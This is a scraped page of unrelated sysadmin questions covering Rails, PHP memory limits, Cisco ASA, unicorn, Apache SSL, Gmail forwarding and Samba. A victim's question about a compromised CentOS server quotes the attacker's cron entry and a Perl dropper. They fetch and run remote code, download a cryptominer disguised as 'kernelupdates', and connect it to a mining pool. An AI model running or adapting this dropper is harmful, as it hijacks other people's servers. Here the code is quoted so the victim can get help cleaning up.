PRAGMA index_list("views") In my vhost I have it set to use RailsEnv private. <VirtualHost *:80> # ProxyPreserveHost on # # ProxyPass / http://10.220.100.209:180/ # ProxyPassReverse / http://10.220.100.209:180/ DocumentRoot /var/www/pwpusher/public <Directory /var/www/pwpusher/public> allow from all Options -MultiViews </Directory> RailsEnv private ServerName pwpush.intranet ErrorLog /var/log/apache2/error.log LogLevel debug CustomLog /var/log/apache2/access.log combined </VirtualHost> My passenger.conf in mods-enabled is default for Debian. <IfModule mod_passenger.c> PassengerRoot /usr PassengerRuby /usr/bin/ruby </IfModule> In the apache error.log I get something more cryptic to me. [Sun Jun 10 06:25:07 2012] [notice] Apache/2.2.16 (Debian) Phusion_Passenger/2.2.11 PHP/5.3.3-7+squeeze9 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o configured -- resuming normal operations /var/www/pwpusher/vendor/bundle/ruby/1.8/bundler/gems/modernizr-rails-09e9e6a92d67/lib/modernizr/rails/version.rb:3: warning: already initialized constant VERSION cache: [GET /] miss [Sun Jun 10 08:07:19 2012] [debug] mod_deflate.c(615): [client 10.10.2.13] Zlib: Compressed 728 to 423 : URL / /var/www/pwpusher/vendor/bundle/ruby/1.8/bundler/gems/modernizr-rails-09e9e6a92d67/lib/modernizr/rails/version.rb:3: warning: already initialized constant VERSION cache: [GET /] miss [Sun Jun 10 10:17:16 2012] [debug] mod_deflate.c(615): [client 10.10.2.13] Zlib: Compressed 728 to 423 : URL / Maybe that's routine stuff. I can see the rake command create files in the relative app root db/. I have private.sqlite3, production.sqlite3 among others. And here's my config/database.yml. base: &base adapter: sqlite3 timeout: 5000 development: database: db/development.sqlite3 <<: *base test: database: db/test.sqlite3 <<: *base private: database: db/private.sqlite3 <<: *base production: database: db/production.sqlite3 <<: *base I've tried setting absolute paths in it but that did not help.

    Read the article

  • Unable to remove limit on memory usage for PHP script.

    - by Jess Telford
    The Situation I am having an issue with a PHP script getting the following error message: Fatal error: Out of memory (allocated 359923712) (tried to allocate 72 bytes) in /path/to/piwik/core/DataTable.php on line 969 The script I'm running is: /path/to/piwik/misc/cron/archive.sh I am assuming the numbers are Bytes, which means that total is approximately 360MB. For all intents and purposes, I have increased the memory limits on the server well above 360MB, yet this is the number (give or take a byte) it consistently errors out at. Please note: This question is not about fixing a memory leak in the script, nor about why the script itself is using so much memory. The script is part of the Piwik archiving process, so I cannot just fix any memory leaks, etc. For more info on this script and why I am increasing the memory limit, see "How to setup auto archiving" The question Given that the script is attempting to use over 360MB of memory, which I cannot change, why does it not seem possible for me to increase the amount of memory available to php on my server? What I've tried Increasing PHP's memory_limit Given the php.ini file: php -i | grep php.ini Configuration File (php.ini) Path => /usr/local/lib Loaded Configuration File => /usr/local/lib/php.ini I have edited that file, so the memory_limit directive reads; memory_limit = -1 Restart Apache, and check the new value has stuck; $ php -i | grep memory_limit memory_limit => -1 => -1 Run the script, and get the same error. I've also tried 1G, 768M, etc, all to the same result (ie; no change). Update 22nd June: Based on Vangel's help, I have attempted to set post_max_size to 20M in combination with setting memory_limit. Again, this has no effect. Removing the memory limit on child processes of Apache I have found and edited the httpd.conf file to make sure there is no RLimitMEM directive. I then used WHM's Apache Configuration Memory Usage Restrictions to generate a restriction, which it claimed was at 1000M (and confirmed by checking httpd.conf). Both of these resulted in no change to the script erroring at 360MB. Increasing the per process memory limits of Linux The current limits set on the system: $ ulimit -m 524288 $ ulimit -v 524288 I have attempted to set both of these to unlimited: $ ulimit -m unlimited $ ulimit -v unlimited $ ulimit -m unlimited $ ulimit -v unlimited Once again, this has resulted in absolutely no improvement in my problem. My setup $ cat /etc/redhat-release CentOS release 5.5 (Final) $ uname -a Linux example.com 2.6.18-164.15.1.el5 #1 SMP Wed Mar 17 11:30:06 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux $ php -i | grep "PHP Version" PHP Version => 5.2.9 $ httpd -V Server version: Apache/2.0.63 Server built: Feb 2 2011 01:25:12 Cpanel::Easy::Apache v3.2.0 rev5291 Server's Module Magic Number: 20020903:13 Server loaded: APR 0.9.17, APR-UTIL 0.9.15 Compiled using: APR 0.9.17, APR-UTIL 0.9.15 Architecture: 64-bit Server compiled with.... -D APACHE_MPM_DIR="server/mpm/prefork" -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D HTTPD_ROOT="/usr/local/apache" -D SUEXEC_BIN="/usr/local/apache/bin/suexec" -D DEFAULT_PIDLOG="logs/httpd.pid" -D DEFAULT_SCOREBOARD="logs/apache_runtime_status" -D DEFAULT_LOCKFILE="logs/accept.lock" -D DEFAULT_ERRORLOG="logs/error_log" -D AP_TYPES_CONFIG_FILE="conf/mime.types" -D SERVER_CONFIG_FILE="conf/httpd.conf" Output of $ php -i: http://pastebin.com/EiRut6Nm

    Read the article

  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CENTOS6 server running with some wordpress & tomcat websites. In the last two days it has been crashing continuously. After investigation we found that kernelupdates binary consuming 100% cpu on server. Process is mentioned below. ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx But this process seems invalid kernel update. Might be server is compromised and this process is installed by hacker, So I've killed this process & removed apache user's cron entries. But somehow this process started again after couple of hours & cron entries also restored, I am searching for the thing which is modifying cron jobs. Does this process belong to a mining process? How can we stop cronjob modification and clean the source of this process? Cron entry (apache user) /6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelupdates/gi) { die; } if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) { $wig=`wget --version | grep GNU`; if(length($wig>6)) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } } @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); print "done!\n"; Thanks in advance!

    Read the article

  • Cannot open simple script application on mac

    - by streetpc
    Mac OS X 10.6 I created a very simple app, which is only a wrapper of a shell script (so that I can select this script in application selectors, like startup apps). I try to launch it and yesterday it worked, but today I changed the executable script's content and name (with something that perfeclty works in a shell script launched in the Terminal) and it will only display a Finder-iconed dialog saying Cannot open the application because it is not supported on this kind of Mac. I restored the previous script (content/name) but I still get the error! Same when re-bundling the app from scratch, or completely changing the bundle identifier… If I try to open it in the Terminal using open My.app, I get The application cannot be opened because it has an incorrect executable format. But when I executes directly the Contents/MacOS/Script, it allways works (iwth both contents). Also, it is displayed with correct icon and meta-information in the Finder (so I guess the Info.plist is understood). The app's file tree is: Contents/ Info.plist MacOS/ Script (executable bit set, works when launched directly) PkgInfo Resources/ AppIcon.icns Here is the Info.plist content: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>CFBundleExecutable</key> <string>Script</string> <key>CFBundleIconFile</key> <string>AppIcon</string> <key>CFBundleIdentifier</key> <string>asdf.ScriptApp</string> <key>CFBundleInfoDictionaryVersion</key> <string>6.0</string> <key>CFBundleName</key> <string>My script</string> <key>CFBundlePackageType</key> <string>APPL</string> <key>CFBundleShortVersionString</key> <string>1.0</string> <key>CFBundleSignature</key> <string>????</string> <key>CFBundleVersion</key> <string>1</string> <key>LSMinimumSystemVersion</key> <string>10.4</string> </dict> </plist> And the PkgInfo file only contains APPL????. I tested the Script with a simple echo "ok" and echo "ok" >/tmp/test (plus #!/bin/sh header). So my questions are: Is there some kind of validity caching for applications ? based on what ? how do I flush it ? Where does this message come from ? I tried to google it but all I get is a page talking about 32/64 bits Java…

    Read the article

  • i cant ping to my DMZ zone from the local inside PC

    - by Big Denzel
    HI everybody. Can anyone please help me on the following issue. I got a Cisco Asa 5520 configured at my network. I cant ping to my DMZ interface from a local inside network PC. so the only way a ping the DMZ is right from the Cisco ASA firewall, there i can pint to all 3 interfaces, Inside, Outside and DMZ,,,, But no PC from the Inside Network can access the DMZ. Can please any one help? I thank you all in advance Bellow is my Cisco ASA 5520 Firewall show run; ASA-FW# sh run : Saved : ASA Version 7.0(8) ! hostname ASA-FW enable password encrypted passwd encrypted names dns-guard ! interface GigabitEthernet0/0 description "Link-To-GW-Router" nameif outside security-level 0 ip address 41.223.156.109 255.255.255.248 ! interface GigabitEthernet0/1 description "Link-To-Local-LAN" nameif inside security-level 100 ip address 10.1.4.1 255.255.252.0 ! interface GigabitEthernet0/2 description "Link-To-DMZ" nameif dmz security-level 50 ip address 172.16.16.1 255.255.255.0 ! interface GigabitEthernet0/3 shutdown no nameif no security-level no ip address ! interface Management0/0 description "Local-Management-Interface" no nameif no security-level ip address 192.168.192.1 255.255.255.0 ! ftp mode passive access-list OUT-TO-DMZ extended permit tcp any host 41.223.156.107 eq smtp access-list OUT-TO-DMZ extended permit tcp any host 41.223.156.106 eq www access-list OUT-TO-DMZ extended permit icmp any any log access-list OUT-TO-DMZ extended deny ip any any access-list inside extended permit tcp any any eq pop3 access-list inside extended permit tcp any any eq smtp access-list inside extended permit tcp any any eq ssh access-list inside extended permit tcp any any eq telnet access-list inside extended permit tcp any any eq https access-list inside extended permit udp any any eq domain access-list inside extended permit tcp any any eq domain access-list inside extended permit tcp any any eq www access-list inside extended permit ip any any access-list inside extended permit icmp any any access-list dmz extended permit ip any any access-list dmz extended permit icmp any any access-list cap extended permit ip 10.1.4.0 255.255.252.0 172.16.16.0 255.255.25 5.0 access-list cap extended permit ip 172.16.16.0 255.255.255.0 10.1.4.0 255.255.25 2.0 no pager logging enable logging buffer-size 5000 logging monitor warnings logging trap warnings mtu outside 1500 mtu inside 1500 mtu dmz 1500 no failover asdm image disk0:/asdm-508.bin no asdm history enable arp timeout 14400 global (outside) 1 interface nat (inside) 1 0.0.0.0 0.0.0.0 static (dmz,outside) tcp 41.223.156.106 www 172.16.16.80 www netmask 255.255.255 .255 static (dmz,outside) tcp 41.223.156.107 smtp 172.16.16.25 smtp netmask 255.255.2 55.255 static (inside,dmz) 10.1.0.0 10.1.16.0 netmask 255.255.252.0 access-group OUT-TO-DMZ in interface outside access-group inside in interface inside access-group dmz in interface dmz route outside 0.0.0.0 0.0.0.0 41.223.156.108 1 timeout xlate 3:00:00 timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02 timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 timeout mgcp-pat 0:05:00 sip 0:30:00 sip_media 0:02:00 timeout uauth 0:05:00 absolute http server enable http 10.1.4.0 255.255.252.0 inside no snmp-server location no snmp-server contact snmp-server enable traps snmp authentication linkup linkdown coldstart crypto ipsec security-association lifetime seconds 28800 crypto ipsec security-association lifetime kilobytes 4608000 telnet timeout 5 ssh timeout 5 console timeout 0 management-access inside ! ! match default-inspection-traffic ! ! policy-map global_policy class inspection_default inspect dns maximum-length 512 inspect ftp inspect h323 h225 inspect h323 ras inspect netbios inspect rsh inspect rtsp inspect skinny inspect esmtp inspect sqlnet inspect sunrpc inspect tftp inspect sip inspect xdmcp ! service-policy global_policy global Cryptochecksum: : end ASA-FW# Please Help. Big Denzel

    Read the article

  • Unicorn installation error on Debian 5

    - by Luc
    I am running ruby1.9 on Debian 5, and did not manage to install 'unicorn' with rubygems. I got this error and do not really know how to solve it. Do you have any idea of the possible root cause ? > gem install unicorn Building native extensions. This could take a while... ERROR: Error installing unicorn: ERROR: Failed to build gem native extension. /usr/bin/ruby1.9 extconf.rb checking for CLOCK_MONOTONIC in time.h... yes checking for clockid_t in time.h... yes checking for clock_gettime() in -lrt... yes checking for t_open() in -lnsl... no checking for socket() in -lsocket... no checking for poll() in poll.h... yes checking for getaddrinfo() in sys/types.h,sys/socket.h,netdb.h... yes checking for getnameinfo() in sys/types.h,sys/socket.h,netdb.h... yes checking for struct sockaddr_storage in sys/types.h,sys/socket.h... yes checking for accept4() in sys/socket.h... no checking for sys/select.h... yes checking for ruby/io.h... yes checking for rb_io_t.fd in ruby.h,ruby/io.h... yes checking for rb_io_t.mode in ruby.h,ruby/io.h... yes checking for rb_io_t.pathv in ruby.h,ruby/io.h... no checking for struct RFile in ruby.h,ruby/io.h... yes checking size of struct RFile in ruby.h,ruby/io.h... 24 checking for struct RObject... no checking size of int... 4 checking for rb_io_ascii8bit_binmode()... no checking for rb_thread_blocking_region()... yes checking for rb_thread_io_blocking_region()... no checking for rb_str_set_len()... yes checking for rb_time_interval()... yes checking for rb_wait_for_single_fd()... no creating Makefile make cc -I. -I/usr/include/ruby-1.9.0/x86_64-linux -I/usr/include/ruby-1.9.0 -I. -DHAVE_TYPE_CLOCKID_T -DHAVE_POLL -DHAVE_GETADDRINFO -DHAVE_GETNAMEINFO -DHAVE_TYPE_STRUCT_SOCKADDR_STORAGE -DHAVE_SYS_SELECT_H -DHAVE_RUBY_IO_H -DHAVE_RB_IO_T_FD -DHAVE_ST_FD -DHAVE_RB_IO_T_MODE -DHAVE_ST_MODE -DHAVE_TYPE_STRUCT_RFILE -DSIZEOF_STRUCT_RFILE=24 -DSIZEOF_INT=4 -DHAVE_RB_THREAD_BLOCKING_REGION -DHAVE_RB_STR_SET_LEN -DHAVE_RB_TIME_INTERVAL -D_GNU_SOURCE -DPOSIX_C_SOURCE=1-D_POSIX_C_SOURCE=200112L -fPIC -fno-strict-aliasing -g -g -O2 -O2 -g -Wall -Wno-parentheses -fPIC -o kgio_ext.o -c kgio_ext.c cc -I. -I/usr/include/ruby-1.9.0/x86_64-linux -I/usr/include/ruby-1.9.0 -I. -DHAVE_TYPE_CLOCKID_T -DHAVE_POLL -DHAVE_GETADDRINFO -DHAVE_GETNAMEINFO -DHAVE_TYPE_STRUCT_SOCKADDR_STORAGE -DHAVE_SYS_SELECT_H -DHAVE_RUBY_IO_H -DHAVE_RB_IO_T_FD -DHAVE_ST_FD -DHAVE_RB_IO_T_MODE -DHAVE_ST_MODE -DHAVE_TYPE_STRUCT_RFILE -DSIZEOF_STRUCT_RFILE=24 -DSIZEOF_INT=4 -DHAVE_RB_THREAD_BLOCKING_REGION -DHAVE_RB_STR_SET_LEN -DHAVE_RB_TIME_INTERVAL -D_GNU_SOURCE -DPOSIX_C_SOURCE=1-D_POSIX_C_SOURCE=200112L -fPIC -fno-strict-aliasing -g -g -O2 -O2 -g -Wall -Wno-parentheses -fPIC -o autopush.o -c autopush.c cc -I. -I/usr/include/ruby-1.9.0/x86_64-linux -I/usr/include/ruby-1.9.0 -I. -DHAVE_TYPE_CLOCKID_T -DHAVE_POLL -DHAVE_GETADDRINFO -DHAVE_GETNAMEINFO -DHAVE_TYPE_STRUCT_SOCKADDR_STORAGE -DHAVE_SYS_SELECT_H -DHAVE_RUBY_IO_H -DHAVE_RB_IO_T_FD -DHAVE_ST_FD -DHAVE_RB_IO_T_MODE -DHAVE_ST_MODE -DHAVE_TYPE_STRUCT_RFILE -DSIZEOF_STRUCT_RFILE=24 -DSIZEOF_INT=4 -DHAVE_RB_THREAD_BLOCKING_REGION -DHAVE_RB_STR_SET_LEN -DHAVE_RB_TIME_INTERVAL -D_GNU_SOURCE -DPOSIX_C_SOURCE=1-D_POSIX_C_SOURCE=200112L -fPIC -fno-strict-aliasing -g -g -O2 -O2 -g -Wall -Wno-parentheses -fPIC -o wait.o -c wait.c cc -I. -I/usr/include/ruby-1.9.0/x86_64-linux -I/usr/include/ruby-1.9.0 -I. -DHAVE_TYPE_CLOCKID_T -DHAVE_POLL -DHAVE_GETADDRINFO -DHAVE_GETNAMEINFO -DHAVE_TYPE_STRUCT_SOCKADDR_STORAGE -DHAVE_SYS_SELECT_H -DHAVE_RUBY_IO_H -DHAVE_RB_IO_T_FD -DHAVE_ST_FD -DHAVE_RB_IO_T_MODE -DHAVE_ST_MODE -DHAVE_TYPE_STRUCT_RFILE -DSIZEOF_STRUCT_RFILE=24 -DSIZEOF_INT=4 -DHAVE_RB_THREAD_BLOCKING_REGION -DHAVE_RB_STR_SET_LEN -DHAVE_RB_TIME_INTERVAL -D_GNU_SOURCE -DPOSIX_C_SOURCE=1-D_POSIX_C_SOURCE=200112L -fPIC -fno-strict-aliasing -g -g -O2 -O2 -g -Wall -Wno-parentheses -fPIC -o connect.o -c connect.c cc -I. -I/usr/include/ruby-1.9.0/x86_64-linux -I/usr/include/ruby-1.9.0 -I. -DHAVE_TYPE_CLOCKID_T -DHAVE_POLL -DHAVE_GETADDRINFO -DHAVE_GETNAMEINFO -DHAVE_TYPE_STRUCT_SOCKADDR_STORAGE -DHAVE_SYS_SELECT_H -DHAVE_RUBY_IO_H -DHAVE_RB_IO_T_FD -DHAVE_ST_FD -DHAVE_RB_IO_T_MODE -DHAVE_ST_MODE -DHAVE_TYPE_STRUCT_RFILE -DSIZEOF_STRUCT_RFILE=24 -DSIZEOF_INT=4 -DHAVE_RB_THREAD_BLOCKING_REGION -DHAVE_RB_STR_SET_LEN -DHAVE_RB_TIME_INTERVAL -D_GNU_SOURCE -DPOSIX_C_SOURCE=1-D_POSIX_C_SOURCE=200112L -fPIC -fno-strict-aliasing -g -g -O2 -O2 -g -Wall -Wno-parentheses -fPIC -o poll.o -c poll.c poll.c:11:18: error: st.h: No such file or directory poll.c: In function 'do_poll': poll.c:148: error: 'RUBY_UBF_IO' undeclared (first use in this function) poll.c:148: error: (Each undeclared identifier is reported only once poll.c:148: error: for each function it appears in.) make: *** [poll.o] Error 1 Gem files will remain installed in /usr/lib/ruby/gems/1.9.0/gems/kgio-2.5.0 for inspection. Results logged to /usr/lib/ruby/gems/1.9.0/gems/kgio-2.5.0/ext/kgio/gem_make.out

    Read the article

  • ScriptAlias makes requests match too many Location blocks. What is going on?

    - by brain99
    We wish to restrict access on our development server to those users who have a valid SSL Client certificate. We are running Apache 2.2.16 on Debian 6. However, for some sections (mainly git-http, setup with gitolite on https://my.server/git/) we need an exception since many git clients don't support SSL client certificates. I have succeeded in requiring client cert authentication for the server, and in adding exceptions for some locations. However, it seems this does not work for git. The current setup is as follows: SSLCACertificateFile ssl-certs/client-ca-certs.crt <Location /> SSLVerifyClient require SSLVerifyDepth 2 </Location> # this works <Location /foo> SSLVerifyClient none </Location> # this does not <Location /git> SSLVerifyClient none </Location> I have also tried an alternative solution, with the same results: # require authentication everywhere except /git and /foo <LocationMatch "^/(?!git|foo)"> SSLVerifyClient require SSLVerifyDepth 2 </LocationMatch> In both these cases, a user without client certificate can perfectly access my.server/foo/, but not my.server/git/ (access is refused because no valid client certificate is given). If I disable SSL client certificate authentication completely, my.server/git/ works ok. The ScriptAlias problem Gitolite is setup using the ScriptAlias directive. I have found that the problem occurs with any similar ScriptAlias: # Gitolite ScriptAlias /git/ /path/to/gitolite-shell/ ScriptAlias /gitmob/ /path/to/gitolite-shell/ # My test ScriptAlias /test/ /path/to/test/script/ Note that /path/to/test/script is a file, not a directory, the same goes for /path/to/gitolite-shell/ My test script simply prints out the environment, super simple: #!/usr/bin/perl print "Content-type:text/plain\n\n"; print "TEST\n"; @keys = sort(keys %ENV); foreach (@keys) { print "$_ => $ENV{$_}\n"; } It seems that if I go to https://my.server/test/someLocation, that any SSLVerifyClient directives are being applied which are in Location blocks that match /test/someLocation or just /someLocation. If I have the following config: <LocationMatch "^/f"> SSLVerifyClient require SSLVerifyDepth 2 </LocationMatch> Then, the following URL requires a client certificate: https://my.server/test/foo. However, the following URL does not: https://my.server/test/somethingElse/foo Note that this only seems to apply for SSL configuration. The following has no effect whatsoever on https://my.server/test/foo: <LocationMatch "^/f"> Order allow,deny Deny from all </LocationMatch> However, it does block access to https://my.server/foo. This presents a major problem for cases where I have some project running at https://my.server/project (which has to require SSL client certificate authorization), and there is a git repository for that project at https://my.server/git/project which cannot require a SSL client certificate. Since the /git/project URL also gets matched agains /project Location blocks, such a configuration seems impossible given my current findings. Question: Why is this happening, and how do I solve my problem? In the end, I want to require SSL Client certificate authorization for the whole server except for /git and /someLocation, with as minimal configuration as possible (so I don't have to modify the configuration each time something new is deployed or a new git repository is added). Note: I rewrote my question (instead of just adding more updates at the bottom) to take into account my new findings and hopefully make this more clear.

    Read the article

  • Email forwarding from my domain to gmail - FAIL

    - by pitosalas
    [There are numerous similar questions on ServerFault but I couldn't find one that was exactly on point] Background: I use Gmail for my email client. My email is [email protected]. However the email that people communicate to me with is [email protected]. I run the server that hosts www.example.com and other domains, at ServerBeach. Up to yesterday, I had SENDMAIL painlessly just forward emails to [email protected] to [email protected] and everything was fine, for several years in fact. Suddenly my email stopped working - that is, my gmail account stopped receiving emails via the forward from my server. Looking into it I found a bunch of emails sitting on my server with content like this: ... while talking to gmail-smtp-in.l.google.com.: RCPT To: <<< 450-4.2.1 The user you are trying to contact is receiving mail at a rate that <<< 450-4.2.1 prevents additional messages from being delivered. Please resend your <<< 450-4.2.1 message at a later time. If the user is able to receive mail at that <<< 450-4.2.1 time, your message will be delivered. For more information, please <<< 450 4.2.1 visit xxxxxx://mail.google.com/support/bin/answer.py?answer=6592 u15si37138086qco.76 [email protected]... Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that DATA <<< 550-5.7.1 [64.34.168.137 1] Our system has detected an unusual rate of <<< 550-5.7.1 unsolicited mail originating from your IP address. To protect our <<< 550-5.7.1 users from spam, mail sent from your IP address has been blocked. <<< 550-5.7.1 Please visit xxxxx://www.google.com/mail/help/bulk_mail.html to review <<< 550 5.7.1 our Bulk Email Senders Guidelines. u15si37138086qco.76 554 5.0.0 Service unavailable ... while talking to alt1.gmail-smtp-in.l.google.com.: From what I've been researching, I think somehow someone has/is hijacking my domain name or something and this somehow has caused gmail's servers to notice and cut me off. But I don't know really what's going on nor do I see whatever emails might be involved. I've read stuff on zoneedit.com that sounds like they might have a solution in their service for what I am trying to do. I also read a lot about admining DNS and SENDMAIL and tried various things, but nothing works. Can you tell from my description what is going on that caused GMail's server to stop accepting email from my server and is there a way to stop it? What is the 'correct' way to configure things so that emails to [email protected] behave as if they were sent to [email protected]? Thanks so much!

    Read the article

  • How do I resolve "conflicting accounts" in google apps without breaking links to online photos on picasa?

    - by lee
    I have been using google apps for some time, and only recently learned I have what google calls "conflicting accounts" which is creating a problem I haven't been able to resolve. Turns out that the apps account really only covers email, google docs, and the calendar and not other features like picasa, blogger, youtube etc. and at some point they gave me a non-apps google account with my same (proprietary non-gmail) email address for the additional apps. This is the "conflicting account." I had noticed that I sometimes had to come in through another door when I went back and forth, between docs, picasa, and mail let's say, but never understood why since it was the same username and password and I didn't get any communication about it at the time. Google is now in the process of giving google apps users access to the additional apps and providing instructions for consolidating the two accounts. But if I want to move my picasa site into the new apps structure I have to download my albums and re-synch them. This would be disastrous for me as I have hundreds of photos embedded in my websites, and new web addresses would break all the connections. The alternative seems to be to rename my "personal" (non-apps) accounts as described at http://www.google.com/support/a/bin/answer.py?answer=185186: Users with conflicting Google Accounts can easily resolve their conflicts by renaming their personal Google Accounts, and the data in their personal accounts will remain safe and accessible to them. Here’s how a user can rename their personal Google Account: * Step 1: Visit www.google.com/accounts and sign in with your personal Google Account * Step 2: Click ‘Change email’ under ‘Personal Settings’ * Step 3: Enter a different email address where you can receive mail, enter your password, and click ‘Save email address’ * Step 4: Check your other email If your users don’t have different email addresses where they can receive mail, they can resolve the conflict by renaming their personal Google Accounts to @gmail.com addresses instead. Sounds easy enough, right? I gave them a gmail address. The wizard said "sorry you can't use a gmail account for this" --which contradicts the last paragraph above but ok, I switched to a new email address I just created for one of my domains. I can send email back and forth between this account and my google apps account with no problem. But when I try to use it as a replacement on the "personal" side I always get "The password you gave is incorrect." I have tried it over and over and know the password is correct. Since I like to get all my emails though one web interface I initially had the new email set up as an add-on to my google apps email account, but noting that the instructions said the "personal account" email could not be associated with any other gmail account I took it off and went back to accessing it via horde so there would be no conflict there, which seemed to make no difference. I can't figure out why it won't accept the password. Does anyone have any thoughts about that? or suggestions for another way to resolve my picasa problem? any help at all is greatly appreciated. Lee

    Read the article

  • Samba with Active Directory - shares are readonly, NT_STATUS_MEDIA_WRITE_PROTECTED

    - by froh42
    I've set a samba server that seems to work, all shares are seemingly exported as readonly, however. The machine is called "lx". When I'm on lx I can run the following command: froh@lx:~$ smbclient //lx/export -UAdministrator Enter Administrator's password: Domain=[CUSTOMER] OS=[Unix] Server=[Samba 3.5.4] smb: \> mkdir wrzlbrmpf NT_STATUS_MEDIA_WRITE_PROTECTED making remote directory \wrzlbrmpf smb: \> ls . D 0 Fri Dec 3 19:04:20 2010 .. D 0 Sun Nov 28 01:32:37 2010 zork D 0 Fri Dec 3 18:53:33 2010 bar D 0 Sun Nov 28 23:52:43 2010 ork 1 Fri Dec 3 18:53:02 2010 foo 1 Sun Nov 28 23:52:41 2010 gaga D 0 Fri Dec 3 19:04:20 2010 How can I troubleshoot this? What I did: First I set up a fresh install of Ubuntu 10.10 x64. Second I got kerberos working with the following krb5.conf file: [libdefaults] ticket_lifetime = 24000 clock_skew = 300 default_realm = CUSTOMER.LOCAL [realms] CUSTOMER.LOCAL = { kdc = SB4.customer.local:88 admin_server = SB4.customer.local:464 default_domain = CUSTOMER.LOCAL } [domain_realm] .customer.local = CUSTOMER.LOCAL customer.local = CUSTOMER.LOCAL #[login] # krb4_convert = true # krb4_get_tickets = false I also added winbind to group, passwd and shadow in nsswitch.conf. Seemingly Kerberos works: root@lx:~# net ads testjoin Join is OK root@lx:~# wbinfo -a 'Administrator%MYSECRETPASSWORD' plaintext password authentication succeeded challenge/response password authentication succeeded wbinfo -u and wbinfo -g also spit out a list of users and a list of groups respectiveley. I noted that domain accounts did NOT include a domain and they are in german (as on the SBS 2003 that is the domain server). So I get a "Domänenbenutzer" in wbinfo -u's output not a "CUSTOMER+Domain User" or something similar. I'm not sure anymore what I did to the PAM configuration, but here is what I currently have: root@lx:/etc/pam.d# cat samba @include common-auth @include common-account @include common-session-noninteractive root@lx:/etc/pam.d# grep -ve '^#' common-auth auth [success=3 default=ignore] pam_krb5.so minimum_uid=1000 auth [success=2 default=ignore] pam_unix.so nullok_secure try_first_pass auth [success=1 default=ignore] pam_winbind.so krb5_auth krb5_ccache_type=FILE cached_login try_first_pass auth requisite pam_deny.so auth required pam_permit.so root@lx:/etc/pam.d# grep -ve '^#' common-account account [success=2 new_authtok_reqd=done default=ignore] pam_unix.so account [success=1 new_authtok_reqd=done default=ignore] pam_winbind.so account requisite pam_deny.so account required pam_permit.so account required pam_krb5.so minimum_uid=1000 root@lx:/etc/pam.d# grep -ve '^#' common-session-noninteractive session [default=1] pam_permit.so session requisite pam_deny.so session required pam_permit.so session optional pam_krb5.so minimum_uid=1000 session required pam_unix.so session optional pam_winbind.so At some point I joined the linux box into the AD domain. After (manually) creating a home directory on the linux box I can log in using the Adminstrator user with the password taken from AD. Now I run samba with the following setup: [global] netbios name = LX realm = CUSTOMER.LOCAL workgroup = CUSTOMER security = ADS encrypt passwords = yes password server = 192.168.20.244 #IP des Domain Controllers os level = 0 socket options = TCP_NODELAY SO_RCVBUF=16384 SO_SNDBUF=16384 idmap uid = 10000-20000 idmap gid = 10000-20000 winbind enum users = Yes winbind enum groups = Yes preferred master = no winbind separator = + dns proxy = no wins proxy = no # client NTLMv2 auth = Yes log level = 2 logfile = /var/log/samba/log.smbd.%U template homedir = /home/%U template shell = /bin/bash [export] path = /mnt/sdc1/export read only = No public = Yes Currently I don't care whether export is exported to everyone or just one user, I want to see somebody WRITING to that directory before I start fiddling with the authentication settings. (Who may access it). As mentioned, accessing the share from smbclient results in this NT_STATUS_MEDIA_WRITE_PROTECTED . Accessing it from windows shows ACLs that look correct (The user may write) - but it does not work, I can only read files not write. The directory to be exported looks like this: root@lx:/etc/pam.d# ls -ld /mnt/ drwxr-xr-x 5 root root 4096 2010-11-28 01:29 /mnt/ root@lx:/etc/pam.d# ls -ld /mnt/sdc1/ drwxr-xr-x 4 froh froh 4096 2010-11-28 01:32 